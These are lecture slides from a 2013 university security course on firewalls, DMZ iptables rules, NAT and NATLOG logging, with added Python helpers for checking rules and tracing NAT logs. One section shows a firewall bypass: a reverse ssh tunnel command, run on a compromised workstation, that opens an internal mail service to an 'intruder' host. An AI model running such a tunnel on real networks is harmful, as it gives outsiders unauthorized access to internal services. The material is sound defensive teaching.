Focus on Security: Keeping the bad guys out

3 ICT Security
  Topics:
  - Day 1: General principles.
  - Day 2: System hardening and integrity.
  - Day 3: Keeping the bad guys out.
  - Day 4: Seeing the invisible; what's passing through the wires?
  - Day 5: Summary and conclusions.
  Notes: Security is complex and extensive. Only the highlights will be covered during this course. Aims: increase awareness, show examples, present a framework.

4 ICT Security
  Today's topics:
  - Firewalls: principles and implementation
  - Network Address Translation (NAT)
  - Abusing firewalls
5 Apply A Firewall
  Firewalls:
  - Not a cure for all your problems.
  - Primarily useful to prevent attacks from the outside world aimed at our computers.
  - But... web browsing, email??

6 Apply A Firewall
  Firewalls:
  - Every opening is a hole in the wall: viruses/worms may leave through the hole; malignant software may use encryption, and may thus be indistinguishable from `legal' traffic using encryption.
  - Firewalls need maintenance. Who's doing that? Who has the knowledge to do so?
  - Firewalls are bypassed when the user downloads the malware.
7 Firewalls: Setup
  Terminology:
  - Bastion hosts
  - DMZ
  - Firewall
  - Internal network
  - Multi-homed host
  - (Stateful) packet filtering

8 Firewalls: Setup
  Basic (common) setup:
  [Figure: basic (common) firewall setup]

9 Firewalls: Setup
  DMZ (preferred) setup:
  [Figure: Router -> Firewall; the firewall connects to the DMZ (external servers: DNS, mail, web) and, via a switch, to the internal net (workstations; internal servers: DNS, file, mail)]

10 Firewalls: Setup
  DMZ communication rules cover three boundaries:
  - Internet to/from DMZ
  - Internet to/from internal net
  - DMZ to/from internal net
  [Figure: Internet, Internal Net and DMZ around the firewall]

11 Firewalls: Setup
  DMZ communication rules, Internet to/from DMZ:
  - Incoming only to known services
  - Outbound only as part of established connections
  - No new connections originate from the DMZ
  - Simple plain spoofing protection
  - No forwarding

12 Firewalls: Setup
  DMZ communication rules, Internet to/from internal net:
  - No new inbound connections
  - No new outbound connections if proxying is at all possible; otherwise be extremely cautious
  - No forwarding
  - Simple plain spoofing protection

13 Firewalls: Setup
  DMZ communication rules, DMZ to/from internal net:
  - No new connections from the DMZ to workstations
  - New connections only to/from matching services
  - Simple spoofing protection rules
  - No forwarding
14 Firewalls: Implementation
  Iptables is used to implement the firewall:
  - Widely available
  - Free software
  - No special hardware required
  - Can be used on a per-host or organization level

15 Firewalls: Implementation
  Iptables installation and activation:
  - Installation: apt-get install iptables
  - Documentation: http://www.netfilter.org/documentation/howto/
  - Activation: ./iptables /path/to/rules-file
    The rules file is a simple text file. This scheme is usually fine-tuned.
  Notes: iptables-save and iptables-restore are usually called from /etc/init.d/iptables at startup to reinstall the firewall as soon as the computer boots. iptables-save writes the contents of the iptables to standard output (cout). Incantation:
    iptables-save > /var/lib/iptables/active
  (restore in, e.g., /etc/network/if-pre-up.d)
16 Firewalls: concepts
  What is input, output and forwarding?
  [Figure: Incoming Traffic -> Routing Decision -> FORWARDING -> Outgoing Traffic; or Routing Decision -> INPUT -> Local Processes -> OUTPUT -> Outgoing Traffic]

17 Firewalls: concepts
  Routing decision: INPUT or FORWARDING? What's the intended destination? Incoming traffic is immediately separated into traffic intended for this computer and traffic that is not.

18 Firewalls: concepts
  INPUT: traffic entering the computer that is intended for the computer itself. Verified at INPUT.

19 Firewalls: concepts
  OUTPUT: traffic produced by local processes leaves the computer if verified by OUTPUT.

20 Firewalls: concepts
  FORWARDING: traffic not intended for local processes passes through, if verified by FORWARDING.
21 Firewalls: Rules
  A simple (and not so desirable) initial file:
    -P OUTPUT ACCEPT     # accept all output connections
    -F OUTPUT
    -P INPUT ACCEPT      # accept all input connections
    -F INPUT
    -P FORWARD ACCEPT    # accept all forwarding connections
    -F FORWARD
  No filtering of any kind. Could be useful, though, as a fallback to make visible what you're doing if you're not using a firewall.

22 Firewalls: Rules
  Handling IPv6:
    /sbin/ip6tables --flush
    /sbin/ip6tables --delete-chain
    /sbin/ip6tables -P OUTPUT DROP      # drop output connections
    /sbin/ip6tables -P INPUT DROP       # drop input connections
    /sbin/ip6tables -P FORWARD DROP     # drop forwarding connections
23 Firewalls: Setup
  DMZ setup:
  [Figure: Router -> Firewall; the firewall connects to the DMZ servers (smtp, http, https) and, via a switch, to the internal net workstations]

24 Firewalls: implementing the DMZ
  Recap: DMZ communication rules, Internet to/from DMZ:
  - Incoming only to known services (e.g., smtp, http, https)
  - Outbound only as part of established connections
  - No new connections originate from the DMZ
  - Simple plain spoofing protection
  - No forwarding

25 Firewalls: implementing the DMZ
  Internet to/from DMZ. Incoming only to known services (e.g., smtp, http, https):
    -P INPUT DROP        # chain policy; iptables has no DENY target, the slides' DENY means DROP
    -F INPUT
    -A INPUT -p tcp --dport smtp  -j ACCEPT
    -A INPUT -p tcp --dport http  -j ACCEPT
    -A INPUT -p tcp --dport https -j ACCEPT
    -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

26 Firewalls: implementing the DMZ
  Outbound only as part of established connections:
    -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

27 Firewalls: implementing the DMZ
  No new connections originate from the DMZ. Start the output rules with:
    -P OUTPUT DROP
    -F OUTPUT

28 Firewalls: implementing the DMZ
  Simple plain spoofing protection: outbound packets are accepted only when they carry our own address as source:
    -A OUTPUT -s ${DNS_name} \
       -m state --state RELATED,ESTABLISHED -j ACCEPT

29 Firewalls: implementing the DMZ
  No forwarding:
    -P FORWARD DROP
    -F FORWARD

30 Firewalls: implementing the DMZ
  Internet to/from DMZ: the complete setup
    -P INPUT DROP
    -F INPUT
    -A INPUT -p tcp --dport smtp  -j ACCEPT
    -A INPUT -p tcp --dport http  -j ACCEPT
    -A INPUT -p tcp --dport https -j ACCEPT
    -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
    -P OUTPUT DROP
    -F OUTPUT
    -A OUTPUT -s ${DNS_name} \
       -m state --state RELATED,ESTABLISHED -j ACCEPT
    -P FORWARD DROP
    -F FORWARD
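To see what the complete setup above actually lets through, here is an added Python model (not from the deck, and not iptables itself) that evaluates constructed packets against slide 30's chains the way netfilter does: the first matching rule in a chain decides, otherwise the chain policy applies. The address 203.0.113.10 is an assumed stand-in for ${DNS_name}, 198.51.100.7 an assumed Internet host, and DENY is read as DROP.

```python
"""Model of slide 30's DMZ rules: first matching rule in a chain decides,
otherwise the chain's policy applies (the way netfilter's filter table works)."""
from dataclasses import dataclass

# Constructed: this server's own address, standing in for the deck's ${DNS_name}.
DMZ_HOST = "203.0.113.10"
SERVICES = {"smtp": 25, "http": 80, "https": 443}   # the "known services"


@dataclass(frozen=True)
class Packet:
    chain: str   # INPUT, OUTPUT or FORWARD, as chosen by the routing decision
    proto: str   # "tcp", "udp", "icmp"
    src: str     # source address
    dport: int   # destination port (0 for icmp)
    state: str   # conntrack state: NEW, ESTABLISHED, RELATED or INVALID


def _dport(service):
    """Match for '-p tcp --dport <service>'."""
    return lambda p: p.proto == "tcp" and p.dport == SERVICES[service]


def _established(p):
    """Match for '-m state --state RELATED,ESTABLISHED'."""
    return p.state in ("RELATED", "ESTABLISHED")


# (chain, match, target) in the order of the slide. -P sets the policy used
# when no rule matches (the slide's DENY is DROP); -F only empties a chain.
RULES = [
    ("INPUT", _dport("smtp"), "ACCEPT"),
    ("INPUT", _dport("http"), "ACCEPT"),
    ("INPUT", _dport("https"), "ACCEPT"),
    ("INPUT", _established, "ACCEPT"),
    # -A OUTPUT -s ${DNS_name} -m state --state RELATED,ESTABLISHED -j ACCEPT
    ("OUTPUT", lambda p: p.src == DMZ_HOST and _established(p), "ACCEPT"),
]
POLICY = {"INPUT": "DROP", "OUTPUT": "DROP", "FORWARD": "DROP"}


def verdict(pkt: Packet) -> str:
    """Walk the packet's chain; the first matching rule's target is the verdict."""
    for chain, match, target in RULES:
        if chain == pkt.chain and match(pkt):
            return target
    return POLICY[pkt.chain]


def check_dmz_rules() -> dict:
    """Constructed packets, one per requirement of slide 24, mapped to their verdict."""
    outside = "198.51.100.7"   # constructed Internet host
    cases = {
        "inbound NEW to smtp": Packet("INPUT", "tcp", outside, 25, "NEW"),
        "inbound NEW to ssh": Packet("INPUT", "tcp", outside, 22, "NEW"),
        "inbound RELATED icmp error": Packet("INPUT", "icmp", outside, 0, "RELATED"),
        "outbound reply from server": Packet("OUTPUT", "tcp", DMZ_HOST, 40001, "ESTABLISHED"),
        "outbound NEW from server": Packet("OUTPUT", "tcp", DMZ_HOST, 25, "NEW"),
        "outbound reply, spoofed source": Packet("OUTPUT", "tcp", "192.168.1.5", 40001, "ESTABLISHED"),
        "forwarded packet": Packet("FORWARD", "tcp", outside, 80, "NEW"),
    }
    return {name: verdict(p) for name, p in cases.items()}


if __name__ == "__main__":
    for name, v in check_dmz_rules().items():
        print(f"{v:6} {name}")
```

The "outbound NEW from server" case shows the price of this rule set: the DMZ host can answer, but cannot itself initiate anything, not even the DMZ-to-internal connections for matching services that slide 13 allows; those need their own explicit OUTPUT rules.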
31 Firewalls: implementing the DMZ
  If there's a network behind your box, then your box is a router. Add to /etc/sysctl.conf:
    net.ipv4.conf.default.rp_filter=1        # spoofing protection
    net.ipv4.conf.all.rp_filter=1            # spoofing protection
    net.ipv4.ip_forward=1                    # forward IPv4 packets
    net.ipv4.icmp_echo_ignore_broadcasts = 1 # what it says
32 Network Address Translation
  Concepts: Source NAT
  - The source address (i.e., where the packet is coming from) is modified.
  - Just before the packet leaves the box: POSTROUTING.
  - Example: masquerading
  [Figure: Incoming Traffic -> Routing Decision -> FORWARDING -> NAT: Postrouting -> Outgoing Traffic; or Routing Decision -> INPUT -> Local Processes -> OUTPUT -> NAT: Postrouting -> Outgoing Traffic]

33 Network Address Translation
  Concepts: Destination NAT
  - The destination address (i.e., where the packet is going to) is modified.
  - Just before the routing decision is made: PREROUTING.
  - Example: port forwarding, proxying
  [Figure: Incoming Traffic -> NAT: Prerouting -> Routing Decision -> FORWARDING, or INPUT -> Local Processes -> OUTPUT; both -> NAT: Postrouting -> Outgoing Traffic]

34 Network Address Translation
  Source NAT: changing the address the packet is coming from (POSTROUTING; with POSTROUTING the packet leaves the router).
  Application: computers behind a router use a private range; all information coming from these computers should appear to be coming from the router.

35 Network Address Translation
  Source NAT (POSTROUTING) application: computers behind a router in a private range; information from these computers appears to come from the router.
  [Figure: 192.168.x.y range -> router (192.168.x.y interface: eth1; Internet interface: eth0) -> Internet. Source NAT: 192.168.x.y appears to be the router]

36 Network Address Translation
  Source NAT (POSTROUTING) application:
    -t nat -A POSTROUTING -s 192.168.x.y/24 -o eth0 -j SNAT \
       --to-source $routerip

37 Network Address Translation
  Destination NAT: changing the address the packet is going to (PREROUTING; with PREROUTING the packet enters the router).

38 Network Address Translation
  Destination NAT (PREROUTING) application: computers behind a router in the 192.168.x.y range; information sent to the router is relayed to one of the computers in the private range.
  [Figure: trusted MTA -> Internet -> router (Internet interface; 192.168.x.y interface) -> 192.168.x.25. Destination NAT: 192.168.x.25 receives the mail]

39 Network Address Translation
  Destination NAT (PREROUTING) application:
    -t nat -A PREROUTING -p tcp -s $MTA_IP -d $routerip \
       --dport 25 -j DNAT --to-destination 192.168.x.25
40 Source NAT Logging
  NATLOG logs the network translations. Actions performed by source NAT translations:
  - IPsrc:sport (in the 192.168 range) is translated by the firewall to IPfw:fwport;
  - IPfw:fwport is used when communicating with IPdst:dport.
  [Figure: 192.168.x.y range -> router (192.168.x.y interface: eth1; Internet iface: eth0, IPfw:fwport) -> Internet. Source NAT: 192.168.x.y appears to be the origin]

41 Source NAT Logging
  Standard log facilities offer complex data. NATLOG beautifies the logs, working from either
  - pcap library facilities looking at the interfaces, or
  - information made available by conntrackd.

42 Source NAT Logging
  Two activation commands:
  - natlog indevice outdevice (e.g., natlog eth1 eth0)
  - natlog conntrack (requires conntrack installed)
  Syslog logs may be sent to a dedicated natlog.log (rsyslog filters; the second line discards the message so it is not written to the general logs as well):
    :syslogtag, isequal, "NATLOG:" /var/log/natlog.log
    :syslogtag, isequal, "NATLOG:" ~

43 Source NAT Logging
  Examples of some log entries:
    Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28:049820 (UTC): 10.4.0.6:55359 (via: 129.125.100.246:55359) to 129.125.14.80:113
    Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12:478988 until Jan 6 12:12:08:165852 (UTC): 192.168.19.72:3166 (via: 129.125.100.246:3166) to 173.194.66.138:80
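These entries are what an incident responder has when an outside party reports abuse from the firewall's address: an added Python example (not part of NATLOG or the deck) that parses the lines above and resolves a reported (firewall address:port, destination) pair at a given UTC moment back to the internal host. It assumes the log year (2013, the deck's date) is supplied by the caller, since syslog lines carry none, and it correlates on NATLOG's from/until times, which are UTC, not on the syslog header, which is local time (13:06:28 against 12:06:28 above).

```python
"""Resolve a source-NAT translation seen from the outside back to the internal host,
using NATLOG's 'from ... until ... (UTC): src (via: fw) to dst' lines."""
import re
from datetime import datetime, timezone

# The two entries from slide 43. The syslog header is local time; the NATLOG
# from/until timestamps are UTC and are the only ones used below.
SAMPLE_LOG = """\
Jan 6 13:06:28 vpn NATLOG: from Jan 6 12:04:25:48963 until Jan 6 12:06:28:049820 (UTC): 10.4.0.6:55359 (via: 129.125.100.246:55359) to 129.125.14.80:113
Jan 6 13:12:08 vpn NATLOG: from Jan 6 12:08:12:478988 until Jan 6 12:12:08:165852 (UTC): 192.168.19.72:3166 (via: 129.125.100.246:3166) to 173.194.66.138:80
"""

NATLOG_RE = re.compile(
    r"NATLOG: from (?P<m1>[A-Z][a-z]{2})\s+(?P<d1>\d{1,2}) (?P<t1>\d\d:\d\d:\d\d):\d+"
    r" until (?P<m2>[A-Z][a-z]{2})\s+(?P<d2>\d{1,2}) (?P<t2>\d\d:\d\d:\d\d):\d+ \(UTC\): "
    r"(?P<src>[\d.]+):(?P<sport>\d+) \(via: (?P<fw>[\d.]+):(?P<fwport>\d+)\) "
    r"to (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def _utc(month, day, hms, year):
    """Build an aware UTC datetime from NATLOG's 'Mon d HH:MM:SS' fields (sub-second part ignored)."""
    return datetime.strptime(f"{month} {day} {hms} {year}",
                             "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def parse_natlog(line, year):
    """One NATLOG line -> dict with start/end (UTC) and the three address:port tuples, else None."""
    m = NATLOG_RE.search(line.strip())
    if not m:
        return None
    g = m.groupdict()
    return {
        "start": _utc(g["m1"], g["d1"], g["t1"], year),
        "end": _utc(g["m2"], g["d2"], g["t2"], year),
        "src": (g["src"], int(g["sport"])),   # IPsrc:sport, the internal host
        "via": (g["fw"], int(g["fwport"])),   # IPfw:fwport, what the outside world sees
        "dst": (g["dst"], int(g["dport"])),   # IPdst:dport
    }


def load_natlog(text, year):
    """Parse every NATLOG line in a syslog extract; unrelated lines are skipped."""
    return [e for e in (parse_natlog(l, year) for l in text.splitlines()) if e]


def attribute(entries, via, dst, when_utc):
    """Return the internal (ip, port) behind the translation via -> dst that was active
    at when_utc ('YYYY-MM-DD HH:MM:SS', UTC), or None if no translation covers it."""
    when = datetime.strptime(when_utc, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    hits = [e for e in entries
            if e["via"] == via and e["dst"] == dst and e["start"] <= when <= e["end"]]
    if len(hits) > 1:   # the same fw port must not map to two hosts at one moment
        raise ValueError(f"{len(hits)} overlapping translations for {via} -> {dst}")
    return hits[0]["src"] if hits else None


if __name__ == "__main__":
    entries = load_natlog(SAMPLE_LOG, year=2013)
    # Constructed complaint: "129.125.100.246:3166 hit 173.194.66.138:80 at 12:10 UTC".
    print(attribute(entries, ("129.125.100.246", 3166), ("173.194.66.138", 80),
                    "2013-01-06 12:10:00"))
```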
44 Firewalls and tunnels
  The concept: enter at one end, reappear at the other end.

45 Firewalls and tunnels
  Tunnels, the concept as used in Information Technology:
  - Exchange insecure (unencrypted) information between computers using a secure (encrypted) protocol.
  - Often ssh is used.
  - In real life firewalls allow at least some outgoing connections (http, https, smtp).

46 Firewalls and tunnels
  Often ssh is used:
  - Connect to a remote computer's service using a secure tunnel.
  - Allow a remote computer's local connections to access a remote computer's service.
  What this boils down to...
47 Firewalls and tunnels
  The situation:
  - Workstation (W) and Server (S, offering a sensitive service at port 143), both behind a firewall on a trusted local area network.
  - The firewall accepts only traffic on ports 80 and 443.
  - Intruder (I), located outside the firewall.
  [Figure: W and S (143) on the trusted LAN; Firewall: transfers ports 80, 443; I outside]

48 Firewalls and tunnels
  The intruder: at the intruder an ssh daemon runs watching port 443 (e.g., sshd -p 443).

49 Firewalls and tunnels
  Malware: at the workstation the shown ssh command is executed, using a virus, social engineering, a disgruntled employee?...
    ssh -p 443 -R 1443:server:143 intruder

50 Firewalls and tunnels
  Setting up the tunnel: ssh connects through the firewall to port 443 at intruder.

51 Firewalls and tunnels
  (Ab)using the tunnel: a client at intruder connects using intruder's local port 1443.

52 Firewalls and tunnels
  A secure tunnel is now established through the workstation, allowing the accessor to use the server's service 143 directly. The firewall offers no protection.
  [Figure: client at I connecting to local port 1443 -> ssh (443) through the firewall -> W -> S (143)]
53 Firewalls and tunnels
  Why tunneling?
  - Tunnels secure inherently insecure protocols (pop, daytime, ...).
  - As a side effect: the hacker can use the tools too...
  - Less serious applications: X11 tunneling (see the SSH documentation).
  - Allowing insecure services, running locally, to be accessed through an encrypted tunnel.

54 Firewalls and tunnels
  Tunnels: allowing insecure services, running locally, to be accessed through an encrypted tunnel. Example:
    ssh -L 1313:localhost:13 remote-host
  forward connections from port 1313 at the local host (the "localhost" in the forwarding spec is resolved on remote-host, so this is remote-host's own port 13).

55 Firewalls and tunnels
  Example:
    ssh -L 1313:remote-host:13 remote-host
  forward connections from port 1313 at the local host to port 13 at remote-host.

56 Firewalls and tunnels
  2nd example:
    ssh -L 1313:alternate-host:13 remote-host
  connect to port 13 at alternate-host, succeeding if remote-host allows us to connect to alternate-host's port 13. The connection between localhost and remote-host is secure; the connection between remote-host and alternate-host is not.
  Note: use -g to access port 1313 from any host.

57 Firewalls and tunnels
  Ssh tunnels, a summary. Securing insecure protocols (1):
    ssh -L 1313:some-host:13 remote-host
  Connections to localhost:1313 are forwarded using ssh to remote-host, and from there to some-host:13. some-host may be remote-host. The -g option allows any host to connect to port 1313 of the computer issuing the ssh command (dangerous!).

58 Firewalls and tunnels
  Securing insecure protocols (2):
    ssh remote-host -R 1234:some-host:80
  Connections to remote-host:1234 travel encrypted to the computer issuing the ssh command and are forwarded from there to some-host:80.
59 Focus on Security
  Today's topics:
  - Firewalls: principles and implementation
  - Network Address Translation
  - Abusing firewalls
  Although they can be abused, firewalls usually offer a good line of defense, as they block the majority of intrusion attempts. They offer no protection against abuse caused by infections (possibly caused by users).

60 Focus on Security
  Day 4: Seeing the invisible
  - The bottom line: tcpdump
  - The applications: Wireshark, OpenVAS

61 Focus on Security
  Keeping the bad guys out (?)
  dr. Frank B. Brokken, Center of Information Technology, University of Groningen, 2013